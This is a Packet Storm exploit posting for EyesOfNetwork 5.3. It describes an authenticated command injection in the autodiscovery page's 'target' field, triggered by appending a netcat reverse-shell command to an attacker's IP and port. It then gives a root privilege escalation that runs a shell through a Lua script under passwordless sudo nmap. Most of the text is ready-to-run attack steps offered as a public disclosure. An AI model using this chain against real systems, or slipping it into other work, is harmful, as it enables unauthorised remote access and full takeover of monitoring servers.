EyesOfNetwork version 5.3 remote code execution and privilege escalation exploit. Initial discovery of remote code execution in this version is attributed to Clement Billac in February of 2020.
b49a70cd74fd88c28bcc36ca3e610a09ab57d73a7b7bfbd31a0c6aafadb824ba# Exploit Title: EyesOfNetwork 5.3 - RCE & PrivEsc
# Date: 10/01/2021
# Exploit Author: Audencia Business SCHOOL Red Team
# Vendor Homepage: https://www.eyesofnetwork.com/en
# Software Link: http://download.eyesofnetwork.com/EyesOfNetwork-5.3-x86_64-bin.iso
# Version: 5.3
#Authentified Romote Code Execution flaw > remote shell > PrivEsc
#
#An user with acces to "/autodiscover.php" can execute remote commande, get a reverse shell and root the targeted machine.
==============================================
Initial RCE
In the webpage : https://EyesOfNetwork_IP/lilac/autodiscovery.php
The "target" input is not controled. It's possible tu put any commands after an "&", RCE is possible with a simple netcat commande like :
& nc -e /bin/sh <IP> <PORT>
==============================================
PrivEsc
The EyesOfNetwork apache user can run "nmap" with sudo privilege and with NOPASSWD attribut, so it's possible to become the root user when using classic PrivEsc methode :
echo 'os.execute("/bin/sh")' > /tmp/nmap.script
sudo nmap --script=/tmp/nmap.script
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed